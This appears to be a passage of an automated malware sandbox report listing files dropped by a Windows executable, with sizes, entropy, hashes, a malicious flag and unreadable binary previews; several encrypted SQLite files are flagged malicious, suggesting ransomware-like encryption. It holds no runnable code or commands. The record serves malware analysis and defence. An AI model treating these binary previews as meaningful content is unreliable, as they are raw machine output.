              Preview:cy7...O.-9.k;...(...3...X."..N..GC.....=.'%..z...........2....!I.). .gY..=......9]..c,....>j.X.b.i5.E..W...IL..+.#.(lgJq..`..B.(1{..>1.nMf.v)..;..A%...Ig-..H..gGDG4.|.l3b.mi#EQ.v\_..r%.L..'..u(..Y..u-...T....3...E#T.+........P.F.F..`L1...-..i..!.?].<.n\Je%......F.*(.boi...X....@.u:....|.E.a.=.......s.OR..!...f..e..O..H.Tp..E...:.l=...*5....Gh.D%.~..{...J..Sg...g..iB..s..........rP......|.G.@.o.{.@...F...*i.iX1......O...9..\w!....C.d.sJ......Jr.".K.G.;g'........e.0........Z.#........y\x.<2.J....8-k.g.-.?.........>{D.[."..._W?M...=>......a.."`.j.J...$DH.s..m........./..C....r...AU.......8U.....d...L.......-../..]qb.b1R...J@...c..S.)b.O.aD..{ ..{...k.|rW.e.g.f....k..=N}>6.M.p..m...t[.+.[.._H.X.oQ.."c..H......R(.".d...2.;...g.5...]..H....IP[..."".......?-f.V3....k..|....)W.....w.3#....k..Rs.O..5.....eWx{......>...I......D.H[.>Z...M-.\.E._..Y&S(.9..$....>.y.O./..r.O....^g.~.?.(DO...r..s.R......t.....V.2S.f.]V...}.9...A..!.A5`..G.d...qW.P...a
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.208023208345016
              Encrypted:false
              SSDEEP:3072:L4ekgIm8FWSO9/ZpBRpGYsAtAnh2JxbSJMkf25+saKLfEs4isqmccueT2SvFn1:UgIm8MFGYsAtuSxb+0qvs4iOoMvFn1
              MD5:6F5050ED20F8D9B793447151E4DD39BA
              SHA1:FB0FB8CABFA8619F8373AA474E6CBC85BA3FAC15
              SHA-256:D15B46B759E1B6A84E9FE7320FD7B64BEBB19EFEDE071A37393C38775AA48770
              SHA-512:1CBCA8E726473EE50C0E0F5601C76C5BB3AC293F22F356DDB2B6DC27A2258E98E357454238C13E9F8B63ADB9FF173C9F9B098EB64C64FF6B65DBA9A71329BE66
              Malicious:false
              Preview:..........C.)z2'.0.5.O..>..\.}.....w...:..9F...z....T...{V:.9.DA./....?9..h)Y..q.......&.....l.g..Td.E0.R...]Z....-^.?.5d.~t...n..do..(|....m.Y<.(7d~..!i^.=...e.?(......%..;...2..X..W ...t...M.M..-..MG...h%..R....a.C.Y.......7{2......m.b.W.<.r=..>.......A.K./..a>...Wx.....s...).5...f....q...ug..~.+..D8.0.V1..A..U.H.K...h.|iU!\e.........:v0.(.CX...z..Y.u\}.r9....}.3........?.C.G........QUq..UI.........|_(..jR...)".M..U......A..9...x.6N....v1Q.`.<.s.R.Y....=..8.G....2.......Ks..Ij@3.K..I.C.h{...>....S.FE..>.....'.#.....$.1....W...(PS7..%.X... ...*.......qA.^L.....%.. M..J..:d...:....H..#...H+..;3........|..8.M.#...:K.).i^.Y..!.Y...I............>4.....o..&.."....TO.....@d...)|._.@h{K.r!!A..:.<.l.... j........{..J..6.;......a.@.Iqa...7....a...$;.......*Qx...!P....O...A...'W..l_B.+"&.....^.y{...Wi-....$...M.6.>.......i\_!_...}...=.........T.>..@....>.J.Jl.wy..W.}l.2..Q?.a%.*....G..K.;../!.......b..FV+....b_...*5YSI<.w..fL.r..Z..]..N.m.!..(6..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.207448159331546
              Encrypted:false
              SSDEEP:3072:mXiubz8Zilj/HmtU8GMLn+a2HHrWpAPSM85XPp1wFi8P3he8r7b6HcAOsSONzW7a:mJPB76BOWp0SLlxqFi8P3hrmxOSN/
              MD5:E569602F9113F58AAEEE84475807CEC6
              SHA1:E78F6512CA078D092ED8B34F716F402FD13B55E4
              SHA-256:AFAE813B173CD24979159099BAEF6E55AB0FD43EC456E4626D82870AA244908E
              SHA-512:275C61434F1C8C777D4BE806D48128276C03A8BF719B1B1CCF064FCE673EC601F685EB9D6589AEF09B16EAED3D408A59FC60542F154FD9362F73329FAE8E8EE5
              Malicious:false
              Preview:.....yjWS.D...z........TM.?%...n..,.V.5(q.3t..a.+~...oKe..P..q.......).@...0}........."A...(D3m.. {....%.8..F .M...3..............P:#..P.G5...T....C.............$4#"E.o...."....a..........6....=........f.F.h.(......25.(..........VE[...ds,o...it..:.g)m.k....E.....R%.Z..X.X....!.5....u...q/..`..x{....\....k.."1..I..=..E...X+..$p...kc]].......E9>.....!a.........'....VS.1|b...Z...pD..x.OU....%!..;..&6.B.x.v..sr.QC.K'@/..Nz....5!d?........ee........l&.X...G.,a.K| ......:....lx.,).6.g.-jg.[.=l..@Alz..muZ...U..3R..p..|Z...%..t....?.-..G*.2/.i........m.W...Xc.K-..W...`.s>....Z<.2.$.y..,.Qu.Y.G.`..;xBMz.....>6S08....>g.w.z...4.. B.}t[#..#..Z.G..}.......w..sa..,V:H..........H.}<"}...L,/.8/l~.R.'.I...?....K../Xh.p;.../........'...3..$....}a.MQ.V....x......+[.X.Y.|,.....K....b..l.......M....|.U.b..lCI>1.?..!.w.oT..e.2..w/...bV...>....K..1Zv...J6k..$......@/..4.7.&#...o,!V.".\.Zb.-zH.S....1.1.G.........G..D.k..fO.....S..,.].Fm...y..U...g.vV.+..x.T.].....i..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.2086125834435633
              Encrypted:false
              SSDEEP:3072:kkEeiPzCLxBMdKqezKlLqj2zjnGmz31wnQlarSAgUNYVTXJxQZL1VSI:3iWLTsKBWLNdanSahgUNGzJuZqI
              MD5:9D92A8FC61CD4E3815CC41240A06A0E0
              SHA1:DFEA472111EE440F8C71E81439199DBEA13FDAFE
              SHA-256:AC3EA7FC86A2C20C537EE2235918C8A130DE08550F7F2D98FE8B69C077952A46
              SHA-512:D05960C81A9390B9494629D7A9025BC6DF283DFE1BC1F3367BB67EF6B91F08B82ABC5796697F42C2105E55D47BBC1C67491F38820418688933D19D3B71112657
              Malicious:false
              Preview:.......c...Z...W.2..5x3+).....g.C.............\..VX...).....~U.%.f.....X.nedYKY..p..{....."\.$....R../...<B[.p.e...`......6.2B.D.....8.w/o.9......Z.v,.H.*q..*G...&h...b.+V....PI'.<M...9$....9....G.m..N0u=.2,..B.E:..X....+...~.........K.G..X.....g....Y.q.].0.`....CY@X.<.......=A.[.1....-.&.`[.-C.y=I..a...........I8.D...y...P.]...2.4.`J....\....V ....Wj..B..0....o.N5..R....cz.R...W.D.,r.Lle.3.B.....n.....l.[.l..F......H..3zk....S.r.?=:..ku...4....PT...".F.s.<...L..<.R .iv.[,...".R.s....L.u...h..z...X..[..%.]... xj....s4.{...v..;..N4.-..".2.rN..L.8.6E\......(y....;..M..N.{.......v/+C.+.........`..Q....`8T.!q.]r.C.i..%/..#g.@..e.w....@....xg..l.LXnJF.zMx.[....H/.:...g.4.u.q..?............:.Mwi.k|V&....bg.EBB.....f$.U...wx.g..q.Zi.P8n.S.p..%..J.P.r......y.......k.X.&...I.(.O..\BO...s..T. ..n|...{.l.D.ee..s#..8..oj.m(_.b..G].>bFT.....~.rGb.w4^..k?.xOQ#..d....L5....'R....@...O.._.M.&.=c$u?..`J6.bX....s...#.}.oo......W...t...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):3384
              Entropy (8bit):7.938766540588614
              Encrypted:false
              SSDEEP:96:f2QMd4qY9GOWoqOb/Fn0JSNJBjMYpq1azSFmJxM/xVL8:uD4VG7otb/uJmcszSUJxWb8
              MD5:AC467280BAF7744C0705AD161BB17776
              SHA1:B7A2A3E61BCE9E06782E59BD658C5F1AC75DA077
              SHA-256:F2199B7F904DD668B15A29FF23C93F674DF840630040AAD2369666B97C19D04D
              SHA-512:1C9EF064B0646A4F51650C39B5E56611BF20C5EDD10BCD927E24939BA8A86EE285734635020DED9EE323DB58D5909B58D1319EC69C852F66AB4F1AA02EE763BB
              Malicious:false
              Preview:<?xmlu..1 "...4......F......%...xYx....\9fP....%B..L....:."X.+.(.a..G...H.X.8.....&Z.@.U....=..O......+a.../.x..8+R......G.w....vd...Pxt.F.W\.....O..S&.z....QH..R \.+x...{.V}.z..?..)......!-.h.....).;....[..eT..-}...n%.!..T49.q......H6.G=a.... .4...7W...O...F2I..tD'..J,..J9....7........%vl.Wz.cX.}.v<....Ti...CR5...|.4 ..2.....1...s,.....[q...W,.e...nX..!]wy..E3.j.".5../..bJ...+Q...bI9N.6B.!./..c.U\.....,_"..wl..ms...+u.!..L..#`r...]...x...|.......E....w3.l.A...OfQ..5.........X.ao}x. y/..J.&.h..QC.,../.@h..2.c....i.....~.-#..`.]...B%.|{.)ug.......1ii.[..#...Z:Nz..5.s-+...`...(!.tR.e.4.b...s...T.^M:...1...L...:....t.-.+..nO.y..i7a.Fs.....(*.....g..../YS...g.\..o...L..."_.2>1)=...{.........6[...k. .Y.y.6......&....\;.O.g.o..f.\\<..TaZh......@."9N.x\..2...V.r3q..<uE...}...e.[.i...-l'.g$]Ja9.T...[.p,..gA.!-.j..F......%...Xpp.:.\.2.0..Y..m...-.wDYc.&..@..K...j ...0..F..+.....8!q....(.z....]q....Fn.%Q..z........h.fW....j.qhL..Hi......3..=.5..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):6910
              Entropy (8bit):7.973410586324226
              Encrypted:false
              SSDEEP:192:/LYty1Zls9TtnvoQ2EMtrQ5OU40CPuLske4scF72W:J1ZitnvoQ2E/2hMs452W
              MD5:3582F42E118C167AC0A61664EE961750
              SHA1:AD5C21A8681A02E1F3CB75104458D5FEEF185B0E
              SHA-256:8486E65F0E0B1064FD09C507395E57A0A9C96EAB0463A2201DF9BC5CEFF431FC
              SHA-512:0B977495002FF4907C4334E5088E8F6E38AEA30EA95164795A493136AE109FBDA1A3DA164A1B73391F5C5C847DE534628AE7BA32D5606017EB56D109D1C8D820
              Malicious:false
              Preview:10/05. q......L.<*c@U(....8.....d..,...l*.....'.eE!<.`~y{j..M..G9_.w..CX/2.....Z.6..}.%@.P++.u...p.W.....n.}..IZ.......PK...:t....u.bJs.B.d.......].....D.......h.. ....S.......{....-8..W..(..4.(x...Z..r.gy....?..0....(.J.o:._f\..g..J......Dz_.^.....[p......c.$.GI]...R..'.-...u... G.X..3%F[G.@.?...c...&..)..%.^..!.......;....B=^0x.....MT.6ew>.k+FOAklo..A..y.E........08..l...xK....f.........S-.m....h+.G.<\.F.KN.5R..D...a.`.....h.....b..*0......a.%.E.L.}.c......kJ...Y..tR..k.l.]C...P.2z.c!.......O..1F...X...-....*..-^.M"..6..C....?.[.8.w....B........#.q....!?.V:....r......E.9......j.}^...#.......24$.....q....'g.bD..n..[................2....J].;.R.d..u#?J^jp.G.7......mr.)D..Dn..T............d2M&).Z .".n.&.,v6p.z....t1D.uI.'......./y.T^c.GB.!\...(_..$..C...mL`a..........~.$...AjGU....(b{7.9Y...pnR......Zn.w....AM..!E...U3wBy......<P..I..{-T..!..6-.....@mFl8.Q...qFg.K.p.@....A.b..r.u...7...3.4...i...h..:...>..*.>@.8.][......=.d...1.....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):834
              Entropy (8bit):7.771199234889693
              Encrypted:false
              SSDEEP:24:QFEeZXXlGWgofEvt1ITsLfvB1+7Gg2rbD:1eiborTm1pPD
              MD5:669B6436C4D61F847B91E6361B5703B5
              SHA1:7D37A1947584E835168B253FD501CFD67993C301
              SHA-256:C3F904A3A4428BE6709483DBC2A3BBE3BD059200D995EA5C1B0C853A61F2A04F
              SHA-512:CBB40AFE244DDEF2C3A37CD65BD4E000E97716EA3965FD123D8E462BD8A3C1975ED17E18115703AF1BF078403AEB7B89F2398705344D105EF363E6377D9850BC
              Malicious:false
              Preview:..1.0`U....%.'...w.}.@VjbL.Z........j.*..8)..g`Y..c.S..@].Kgd]WY.S_....!.%B.$....}..;X...,.i.....oa.zWS.....Y.ct...]jP.........;.s......5..sKs.j.>.r.E/..O..k.:k.|.&.ht..e._.E...c......J.........epJ..S.a..m#...r...>7X.5.4P.Y..kzR{....<...O.f.....j.]u.F.G.WH......6i....4......Y.'.>....$.oT.A@s.nc..*^.J._^..(,)...KE.~....k...Y....l<..B .V..%....[.y.V..;^{.t...%....pU&...$.W......<...../{a%.D...[....:..N.......xG8......O.g...%<ZO.%J..u.r.!.<..I..S.....o. ....w\........H=..N.ny...#..:.r..s/.u....b.......I...l.G..wc..P|V`...J%....m...7...u.%.-..6.C..wZ.|h..:.T.....KO...v}...v.[..G........xN....U.....W.Z5<..s...~.r....^.G.:.4f./...z..f..._.%...x#.k)..V...v.5,>^wD8..<I..^..&J/Xg/r[..}.b:.v....%N...w...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:Unicode text, UTF-16, little-endian text, with very long lines (870), with no line terminators
              Category:dropped
              Size (bytes):1742
              Entropy (8bit):7.910615743779034
              Encrypted:false
              SSDEEP:48:q8/TJiCtMPT69t+gQb2LfRJV/AkQcG5VD:qS1kSlQSLfHaxDj
              MD5:C73515342537EBC1BF22CE42F06FA06B
              SHA1:18C5F3BBA52020397916AB404AE0A763FEDE99FD
              SHA-256:335FFFB509647340561F95597F2AA522FE71841EA0FB80DE45A4B763FD4BBFB4
              SHA-512:8092AA453E282E0E4C2624F9B5CBD3791452A0B0BA78FA0C9A41654E4C85D16D9DA9CF26C55C1A94F19E2A4BCA055CBE2959A98CEDCAD6559E0F66CA2A8F724E
              Malicious:false
              Preview:..1.0p....v...y.C<L..... .G.....H!..,.4t-.}O.d...P.\.CgO9......R6....WE>".-t{.q.V..cq..H.h..........w[.&.....7P.r.....:._.1.C{....~../.<..3..BR.3.&..~.SB..[...7p....3Ig...!x.I<.=..Z...egT9JJ.0.....2..,?..JO...o.|..{UyG."(c.=c..Y.R..N..:.a..;.i.....*....D..4\2...>?v'. .W.....0.........m0iN...-.1..r..<......[..X.c...l..W{..l...|..S.U.,?..E.Y.1..|.VskAM...B.D~&}.`N.l.T..,gM$.W.6....s....B.N..I\..}..]....:.J..b.D..3ks.....l>..,..(......o8...y._..|..iF#..q..........R.....t._.K...........Y..u...vmU'....N.7.De.g2.",...^.........M. .q....W+...GBkvN.!.....E.>}..&.*.#fm_.2..o.W-.n.o..*."5..).E..D....T...fQ...gq2}....2....?......."G...X).|c.}.8..8\.v.]..B..'.+.]oM.....2...6.. ...u....c^..d[..]...d.O....1.l.,,1.y..;u....U.5.... >.s^T.*E.."9.Ik...V....n..S....`|5...s+....!...#!.8.}.....0=2:..,......H..#D.dr...i..Np.=wo.,.k.V....Z......%!......b.P.{.....P..h........@`.}..^d(P?..%..&.G...K..!.*..<......[.$..&la..56T.B.....Q...........X..P.....g.0...$k
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1062891
              Entropy (8bit):5.530733433446085
              Encrypted:false
              SSDEEP:12288:WZdmkO55SiEvhJrPqQfxQXSZlV0N8x5thr291gess3TylunXt:WZdPOFCPI
              MD5:14E40D07052E583E68568D4B38EB485E
              SHA1:5F76FC78FBDB01F50AF69630A18C3373C21C9576
              SHA-256:5F307C3FA466E4B4C09EAF040B6221B3603687405CA24C5C94686470417AB20B
              SHA-512:4B4B56F4EE94ADAD97FB27DDA6AF66B0422CD13AD911FDE50B0006A8CA904CB375FEE2AA3D24967F2BC95B15003F6B85727CBF65552CC0CCBD3B8686D50D5797
              Malicious:false
              Preview:<Rule.k...g_.......R.a...../.C.OH~._......ILn.t..{bj;S.M^A...+uI......=c..............t...=.3l.^.......,..m...^...N....Q@.L..*g.6......g!.._.r.C..)...J.$...,..Gdz.......`..c.l......V.|}..v..Dz.k.X.......sD9...}.KU...........wQ.0........"...s...VM.mb{3..en.s.........D....E\..,....=Wb..sE6........n...u..A.3.0..x......-...3O..}[d.J.w....K^.w....N.H<O1gSp..............]T..#.z.{d......m0......n.:Ncz...]C....B.E.....5.....|.c...........;..........Q. .}....[3.'n(6&M...9.5..D.r.!.......57[..B...v."O..!..W.r.S..P ...KS.$.@.K.f.....}F.....Y..@.....j.O".f...}.?b....0.p..q.%.r.Y.....c...j.0..7:w......).A....W._.$.....O..U.i...v.M.^.8.p..a...?.\...B>.'....E.;W..Z.1b$/...Y.(.......y.O..~..!.rqT. .......U.Q..~..^`z..^!.W0...#.(......W..,>.Xe...........a._.k..J..I.zJ.......=X.m.GR.8..ff...F..n)0{...k......H..~......Y....R...,...D.x....x...0I...\.dR9..<..8.a.....m.0. ...R.Sa.&.R.^`Vc..N$.l.ax.5.YAun+d)k...s*a....... .._..^.....{..... ..n
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):320311
              Entropy (8bit):6.632048726506062
              Encrypted:false
              SSDEEP:3072:tG4p2PcEWrawU/FfNtci7zsxs8e5wKIHuviXsZYDL9Fv:YUApFso8e5iOmLDL9Fv
              MD5:BA516A956EBB2A796F50F68A9AC14744
              SHA1:298B94688F5B44D526A067E07EA4F469D00C9616
              SHA-256:44C2D8D74486199142E911B8A9315B50F6482435CD5C677F1798F3B378696D80
              SHA-512:E9BE81D82AE104E173B7581FA1061EC18DB0AC9A1FB3AE91A938658EB3A0F9D0C810FAB6A3C5F7B1D5121C1BD234C477956CF2A872E5FF6BECFC5019BDF484A9
              Malicious:false
              Preview:<Rule....r..l.\.../.<...v.>....P}...?.T..%d_.(.....44..I.!...3..#.CW5._...U.}.8.h...h.+fY...4.,i..Z87()....O{..F..Fttx...+0($..t.2.%4-0n....j(...FTV5....ef.i.Y....\..!..cu....A.(.@]..V..X](Q.m.....}9 ...G..i0&!..L..h.....k]....*....bj...-i.y.I..D.5....EK.wQg'B..U....m........<Yh.1.Sk........N.....9_.l..lR.xc*..vx,k....o.I.K#.%+#^y""E.)......q_........0j.*.YX....]..bL..U......z&.D.ra.....P/Z...p`.....8.D.VM4=A6.S..D..(......!/u.I:.5..s".R.|.x\m.....U..pV..P... .0.9D9#.O...B..#CK.:.=qy...n.....M..]m.....Y...]X..M..U.r[....R...O.]yD u.$...(r#_..l.7.Z.......b..O....(....[.5.2../.Iv.^.E.78.~t.`.(7.X...'...D..5.p.m...-..Am.C.<..t...]k.).v8..w.]8..&`^..x....@.`.3.b.......,1...$mj.,6z63e7..p...6rkw. U...-N...3..7....u....)m.M.W......s...2.>&..m.P...Le.....;.3.h..........U.`..guS...N.#..>..."..^sa.[.p.."..!..Y.....w.l.tp....u.?7..*@9....VZ.-.s.:.P..h..oF]...O....=Bg.y....q..Z|...ut..CEm.6......m.g..0..H...R..F.:.... ^w.~V.).:.@>..4D..+.@./.h.{R
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):361051
              Entropy (8bit):6.514522155401723
              Encrypted:false
              SSDEEP:3072:1J8p4/dPD2s2+MUP/Ps011DPCO848r9bw/QJACbFbKMgDCyy2x078T9mqs:1JJYn4P/Ps2hXn8pJDbFbeDCyx0Zqs
              MD5:176C787FA7511C7D5A8C5213C3D19C11
              SHA1:5A7372109ACAD99D7D230615E1F63ACEC139CFAD
              SHA-256:5D7E4C07D6542D521A6D37F2ABAB9FCC71A242328AD47F78D6579880D63A5221
              SHA-512:BF494314A4C37D279D9AC63897DD6950D76F94B5FFA3E7CD5DBE5DA21E1AEFCA3CF4A2490428D4EBD04FD2D735124EDFFD66742CED83E8ACE70DAAC81A10293B
              Malicious:false
              Preview:<Rule..G....D..o...J...w.v..2..$W..LBE..7.....5....wj.e. N...Ju...+.(.4L......~.Q........G..L.G~.^.{.......[U.w..a]U0....!....J..`...,.."..J.....i"..z.B. `.....?..n.t..-%FK.3.....L.(.G.d.G.U'..J~E....h.s..;$..5s.h...Tv'..=.&:..1....]I..h3..mCM.'.<........X._........W'~.........KX8u.$..g...Bu2........!?.....lw..>...J.....1..q.cq..<..>.Q.d..Q.pw....A..).w....\...Hy.mF......~k5-=g..;.O..m..Q .2O1R.\..._..:.....K!.{c&.V...5....*....!m.....}.m..N..Z..F..zb..;........+/.Z.O. u*.PU$.tz.E.....\.V..*f...U{.5.C......k<..?..6[.,Ns..`..l...I...v\ET.t.V.(.%:..F:.c.[.k...Wd.N,.....l.Jy-..``.u4~.......!.D`....).0....P#..[.uw.../......^.m[.G|.$&.2.E.T.F..[...oU..*^.V~..+I.....?..........~.(4.. .C.K. ...P...;iF..p...Hcco.)!.w.._..."..7.......b....f...}0..$.Ntp..)..S....,x9.o..?#.n...x....sp..ThZO...5.....:4pZ.....1...._.nP.M...*.+..Q..^]...R.6k..."O...!....7M..Q7.:.-........".SY.... [e.=K.f.g`KA.q...._. {...MF...'.T..9}/........&..5...G|..U..W_...b`.....'
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1098
              Entropy (8bit):7.818965691997675
              Encrypted:false
              SSDEEP:24:0Gt0zJ72TTj8eYHqRyOheADpnexzApE7RmpoPu+g1tmr7bD:30zBSTj8ezRdMiepAOtmpsufirD
              MD5:14D3C308348F3650D52FC8600652B050
              SHA1:C57409C70B13E3C2FFD4A817DEFA167E31A84F3E
              SHA-256:31258F812EA09984556019B8C783D9FE5B9B53BA394BDAE22F35C9BB379CFEA3
              SHA-512:6D05A080D2D73E18C4E64CC0D78E44EACFA79AF27E5C22E6C01782681DCC768A8612B450A6B758F1AF0EE34C6BE432FE5D5045DF11628B3093C77B3A2C8EC902
              Malicious:false
              Preview:3.7.4....$CvEc~..vl..qSi....f.vQo.g.D.k..^a{|..<[I..h.o......gk.*.n.......+.`..W...N.F{..S...fQ-.0......A..)Zy.C....Qzw....+*.$..[Ceg.......(..p.7K...^...2...G./=......mu.W..!ZJ]*}... 99...%.3s...z.E..1..3....]3+....8KS_...s.yP%8e.;...../.(.....iLXCVr<l..W.kM..n_..Sq/?Q\.I}O,...d]r...|.`.a...6.H.....l.em.....b....8........2..N.............(48.gz..x...D.&B..]...7.G.....H.@}7^J|."nDb`....8..i.y.Vs......M.t.M..eI.X.N.{P......=..V~.y.P.P7o;.z.,O.V:v..\.z..x.-..36..6.}.(..%.}{.......C..|.-..H...K!..[.,9.....)...9.J..j..4k.%.#....!..S......<....)..+..{......9|.....e.....[.h....{.ZB_.C(-.n'.C.....F.h..qA.7.P........@;&sG..?..u.v:.9.....w....Xm..Uw....xK.Y5.0............]t`.9....$9/........:.5.2j].Z.fC..E.....C....-...*k.1.K.z&.A.....)Q|...9....9..3/.....2+.2.2....H...c..G..n.6..m.1X.f.$.s.....*.(e....R0j S...h.....b.n.....o...l..<..5..@..E..R..r.....O....#....-..o...e..\........]^....WZ..>..2..-......J..@.>.^.i..;..m.|7..X{...}.:.@..4..@\..?
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):24910
              Entropy (8bit):7.99275977369084
              Encrypted:true
              SSDEEP:768:29w3qarVl9Yi9NNRe+lktlO4EvGwr+sVQ:H6avOqNPN6TO4E6J
              MD5:7D194AE6B24A7B0ACD70C6AC1B92B1AB
              SHA1:C7A98123980F4F94515CFA554552CB862750614C
              SHA-256:BBFE8D05141C96240E0BF071D93E12E134FD4227CD20984B48D28BBD193DAC05
              SHA-512:D6DD13576E815CE1CB36469E96DF9762BC7D868E6297E9DDAB87F63C212A66A62BD856E00BE5A16B8E1D43385E4EE9ACC0357ADDD2FF5A5530CFB4D970B38B47
              Malicious:true
              Preview:SQLit...............w...L...........J..1.s.@...N.U....$..3..j..$......p.&.<.0jgF...f.._P....6.ko....NH..m.......2.B}.3........,=.O.F4...$.........6n.......b.....pJ/9...F.|..^Q.].v.4..5.`3...*AI.U|......W`M...,K...a..|.q.l..@B..f....K..(..~4..z....nyn.i.V...W.=..iJ..6.!./.9U.a...-5e.$..rG1...I<.y.. .....'....H..I.w.?.K.E.%L..cSi.P..a..m..}q...W....z>l..:3|sO...e....r....7..{....]..c..C.C...(u..[......._.....^5d..*..%h:.....3.'...}Fm.......3.L(..q...9...s.q../7.....1.hx..'!.-78..D.jj(A>..S.S.....mS.....U.d...D.:3=....f..0...)).#^.t.LP..o.3...Q.+p<..=...uo.]....!.kE....K{.....b..W.n.n.)z....o.z....bW._x.W..&.P....g.<...C.2V3g.w.1..+....5...7....7.r..Q~..,..3.(..F..\.Ji..5..-e.rD.-..k......F..?.~..-...!.x....W..!...h.e.OWI..A......s.bf1......Q..>.. .U..)m._~...O./zj.(.r..X.9..$.}...t..R....8y.I.)....m.......o.V.D.N..{?w.X.}u.~.....,...4...,..A.i@X+#(.,.aN..N.N.k?...l..g<......U~....$x..t~.)...T^....k{.e..|...4.4..|..,..V!.....m..rD....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):24910
              Entropy (8bit):7.992766708707924
              Encrypted:true
              SSDEEP:384:HJLdpN/Xxp8dryaoilDOHC2cvL46HjhgkRtneUDDfd0xdHl52V7xNz8lOjuhqea8:pLdpJr8Mgn2cTLFpfkdHfENeO6hqea8
              MD5:F1CED5911AA95AAE2DCC26D764E50B00
              SHA1:9A9CBE511058A793B6613E286D0FA99B92517830
              SHA-256:FB6345AC8C012BAC163F5A98B2A35BBAC3708CCA89D67B19C1A3E468B5DE2131
              SHA-512:70D93AABF29FAFDD573619473E1B32E973C25A98F21DA1FDF532F4524F35A02C880A1D8ACB4208E6F99C82B73558F4404CD4EABAA3EED0E92F00001A2150E170
              Malicious:true
              Preview:SQLit.....$cW..K..T..../...s.h.y.OE+..<...W..6...7..#.L......0....^....../o..L"..&.J..S....R.Q)..'.,.....f.....U..K#...T...K.hh1..q....l;'.....>+L,....>.h@..Z.p>R..A....O..WN9i..?...e.Y...R.......zc....._.DT.=..T.{t..5.`...G?z.^.W..<.Gr..5W..Z..C.y.b..y...Mr'l..d......GZ...Z.R.<.=.G....rF..I.......[T*...4...../....(..M....m....4...1k..../`....qC}..^.E.q6L{w:.B.%.M.7.(p2..L.......Lj.~{...[U!.Q.q.........k.JKu..W..n......D7....F......*...O.?....D3"^J.@:....G1...b..l.......z......e.c.x.].A..=xS.......M&]Q.#..8...M~..Y...r....B_3.<.hg...qS.>.V....lt.8.j@...]IE...%..&..im......\.l.6.Y...s..l*.t.I..SY.gc..pt...@GH....tU...7...}'.5.. A.....|M.8*"..\q0'SB...+.F.1F:......a..W..R.#....j3..5*...b._...&]...S...u.Le.0.....*.s92.Y.b....r].".A/......b\D.*2......m...j...-t..N..r.....xij..y....g~..e.+...M.S...Z<.H.5...D.k.pj.Z%.5.W..g...o.=..^...bn.)5.p....j....u.,..?....h.& ..........7K..Br.@.P.`A2..dgnz.$-f...f.Q._\...{...}"2R....}.TJ.w...M...u..`.=.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):24910
              Entropy (8bit):7.992222812835984
              Encrypted:true
              SSDEEP:384:qVy1rHLFDX8qdwMfjlwgLZAv0ijhXFLVJg1DQmIJq4KlO9XYnFL:qVO/FxdXlwgL0NHrg16wyXcL
              MD5:240D8BAD74C01C29A61AEED6FA472AD5
              SHA1:BCC0F2F03FF7618A72A503E4C9ED08E1D9D6BA98
              SHA-256:C78CE63C08EC97CB600BC28C29645BD3F04A9BA4C35041E9F0CA8819862EAF97
              SHA-512:B7BD1953750EFEEDE0215BA4ADB89C4A2C2EFF5A48B9AEFBB65328936A9C54686B33B4D68F6A66D7E8B93C4ADF4E70AC8B0CFA9688706B7611443A9E32D162F5
              Malicious:true
              Preview:SQLit..cZ.......{.t~h..O.I"...rk..ck?.C.h.g.D.'.78+1.d...}...Ht@.,......qU..D~..:.u+..e.:_..9..h.~..1@l....|g......F.......7...._.......EU]s......^..'.T..;t.$..cc...h7e.b..J/|......9~v.u...d.....~..QfN>.~[...ea.!.[DH.L.T...]L....d[E-...D.tT.Mhu.....JL.....84...'D....1......!7..p....U*jn....$v.. z.2.......-`.?_.P..-D...b[.A4gI.L.W.z.....f..8.F.NG...z.4....SMF!..4!....o0.....Z1/.<...n..&..K.7..k.Vh]........=R...P..M..._z~....g. 5..6..4....g.oA..A(...#.Alc.dt]F...M.Q.E+c/...; .."O.6.THH.K.V...k....Nr.....5..W..83p .....K......-...OyzJnH.i....A=..m..&...h...Z.......N..U...tn(...@@1.R....(#)=./a.dz..O'......v.W..b.......14.R...(..C.M..u7&U.T.....^.6w...........9t..%c.K1:..r%..4.F....Lxk$2s.....,.i..<MKdW8...L..}....Il.../%.......j1..<....5......e.$............L/....Zw.7...BjZ...Q3&.Bm.LLh~T>..."o.w.v..._x..T]g.m.;.>*@m=.bg..'........f.1..l.D.8......s.....{.>.p...\.S.F..h..%.|x.B..4.....E..<..$..nj]xi.g....Wo.?....>.&;.R...}k=...y=
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):24910
              Entropy (8bit):7.99257547309578
              Encrypted:true
              SSDEEP:768:UH6oVe/bF4P9hHggcuPh7utw+pdSkFnEa/:Q7Ep4PbALuPhitPfSuN
              MD5:F2C4DAB6C2F5F50DE41E8328042DD9E3
              SHA1:B4FCB7E769513E0976E5F07037D7F5DC4CB45F42
              SHA-256:1EF4AA5859894CB071E25433872B124C1FB4CC3DF61BC8BC1851F6FC948D892E
